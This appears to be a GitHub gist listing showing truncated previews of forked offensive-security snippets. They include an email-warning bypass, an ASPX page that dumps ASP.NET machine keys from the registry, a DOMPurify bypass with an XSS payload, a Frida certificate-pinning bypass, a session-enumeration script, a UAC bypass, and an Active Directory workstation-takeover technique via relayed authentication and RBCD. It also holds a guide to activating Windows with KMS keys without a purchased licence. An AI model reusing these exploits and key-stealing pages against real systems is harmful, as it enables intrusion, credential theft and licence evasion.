@samy4samy
samy4samy / poc.html
Created October 6, 2024 10:25 — forked from knavesec/poc.html
External Email Warning Bypass
<!DOCTYPE html>
<html>
<head>
<title></title>
<style type="text/css">
body {
display: none !important;
background:#FFFFFF !important;
}
@samy4samy
samy4samy / machineKeyFinder.aspx
Created July 23, 2024 10:53 — forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@samy4samy
samy4samy / app.js
Created July 16, 2024 11:21 — forked from kevin-mizu/app.js
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
@samy4samy
samy4samy / windows_activation.md
Created June 16, 2024 16:06
Activate Windows for free

For Windows 10

Step 1 - Open PowerShell or Command Prompt as administrator

Step 2 - Install KMS client key

slmgr /ipk your_license_key

Replace your_license_key with the following volume license keys according to Windows Edition:

// Website you intended to retrieve for users.
const upstream = 'api.openai.com'
// Custom pathname for the upstream website.
const upstream_path = '/'
// Website you intended to retrieve for users using mobile devices.
const upstream_mobile = upstream
// Countries and regions where you wish to suspend your service.
@samy4samy
samy4samy / Get-LoggedOn.py
Created November 2, 2023 19:36 — forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired by itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
// start with:
// frida -U -l pinning.js -f [APP_ID] --no-pause
Java.perform(function () {
console.log('')
console.log('===')
console.log('* Injecting hooks into common certificate pinning methods *')
console.log('===')
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
@samy4samy
samy4samy / Workstation-Takeover.md
Created October 20, 2022 07:11 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.